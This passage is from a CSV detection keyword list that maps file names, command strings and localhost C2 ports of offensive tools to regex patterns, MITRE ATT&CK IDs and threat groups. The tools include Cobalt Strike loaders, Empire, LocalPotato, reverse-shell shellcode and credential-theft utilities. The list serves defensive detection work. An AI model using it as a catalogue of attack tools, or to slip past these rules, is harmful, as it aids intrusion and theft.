"*loader/inject.c*",".{0,1000}loader\/inject\.c.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*loader/inject_local.c*",".{0,1000}loader\/inject_local\.c.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*loader/loader/loader.c*",".{0,1000}loader\/loader\/loader\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","870","139","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z" "*loader_exe_x64.*",".{0,1000}loader_exe_x64\..{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*loader_exe_x86.*",".{0,1000}loader_exe_x86\..{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*Loader'z WEB shell*",".{0,1000}Loader\'z\sWEB\sshell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*LoadEWSDLL*",".{0,1000}LoadEWSDLL.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*loadKirbiFile*",".{0,1000}loadKirbiFile.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*loadliba_reverse_tcp.asm*",".{0,1000}loadliba_reverse_tcp\.asm.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*loadliba_shell.asm*",".{0,1000}loadliba_shell\.asm.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*loadliba_single_shell_reverse_tcp.asm*",".{0,1000}loadliba_single_shell_reverse_tcp\.asm.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*loadmodule *.ps1*",".{0,1000}loadmodule\s.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - 
T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*loadmodume */modules/*.ps1**",".{0,1000}loadmodume\s.{0,1000}\/modules\/.{0,1000}\.ps1.{0,1000}.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Load-PSObfuscation*",".{0,1000}Load\-PSObfuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*Load-PyFuscation*",".{0,1000}Load\-PyFuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" 
"*Local:Get-DelegateType*",".{0,1000}Local\:Get\-DelegateType.{0,1000}","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Local:Get-PEArchitecture*",".{0,1000}Local\:Get\-PEArchitecture.{0,1000}","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Local:Get-ProcAddress*",".{0,1000}Local\:Get\-ProcAddress.{0,1000}","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*-local=0.0.0.0:4001*",".{0,1000}\-local\=0\.0\.0\.0\:4001.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*LocalAdminSharp.csproj*",".{0,1000}LocalAdminSharp\.csproj.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","10","2","150","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z" "*LocalAdminSharp.exe*",".{0,1000}LocalAdminSharp\.exe.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","10","2","150","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z" "*LocalAdminSharp-main*'",".{0,1000}LocalAdminSharp\-main.{0,1000}\'","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","0","N/A","10","2","150","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z" "*localexploit_demo_template.erb*",".{0,1000}localexploit_demo_template\.erb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*localhost/pipe/pwned*",".{0,1000}localhost\/pipe\/pwned.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*localhost:1337*",".{0,1000}localhost\:1337.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1475","287","2024-05-01T19:00:30Z","2022-09-07T02:47:43Z" "*localhost:1337*",".{0,1000}localhost\:1337.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use them with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*localhost:3000*striker*",".{0,1000}localhost\:3000.{0,1000}striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*localhost:31337*",".{0,1000}localhost\:31337.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*localhost:3333*",".{0,1000}localhost\:3333.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1475","287","2024-05-01T19:00:30Z","2022-09-07T02:47:43Z" "*localhost:4567*",".{0,1000}localhost\:4567.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","50","4","2024-04-12T15:25:40Z","2023-04-19T10:59:30Z" 
"*localhost:53531*",".{0,1000}localhost\:53531.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*localhost:8000/*/hardware*",".{0,1000}localhost\:8000\/.{0,1000}\/hardware.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administration tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*localhost:8000/*/netscan*",".{0,1000}localhost\:8000\/.{0,1000}\/netscan.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administration tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*localhost:8000/*/osinfo*",".{0,1000}localhost\:8000\/.{0,1000}\/osinfo.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administration tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*localhost:8000/*/speedtest*",".{0,1000}localhost\:8000\/.{0,1000}\/speedtest.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administration tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*localhost:8022*",".{0,1000}localhost\:8022.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*localhost:8848*",".{0,1000}localhost\:8848.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*LocalPotato (aka CVE-2023-21746 & HTTP/WebDAV)*",".{0,1000}LocalPotato\s\(aka\sCVE\-2023\-21746\s\&\sHTTP\/WebDAV\).{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*localpotato -i*",".{0,1000}localpotato\s\-i.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*LocalPotato.cpp*",".{0,1000}LocalPotato\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*LocalPotato.exe*",".{0,1000}LocalPotato\.exe.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*LocalPotato.html*",".{0,1000}LocalPotato\.html.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*LocalPotato.sln*",".{0,1000}LocalPotato\.sln.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*LocalPotato.vcxproj*",".{0,1000}LocalPotato\.vcxproj.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*LocalPotato.zip*",".{0,1000}LocalPotato\.zip.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*LocalPotato-master*",".{0,1000}LocalPotato\-master.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*localreconmodules*",".{0,1000}localreconmodules.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*localrelay_linux_amd64*",".{0,1000}localrelay_linux_amd64.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*localS4U2Proxy.tickets*",".{0,1000}localS4U2Proxy\.tickets.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*LocateBrc4Config*",".{0,1000}LocateBrc4Config.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*lockless *.dat*",".{0,1000}lockless\s.{0,1000}\.dat.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - 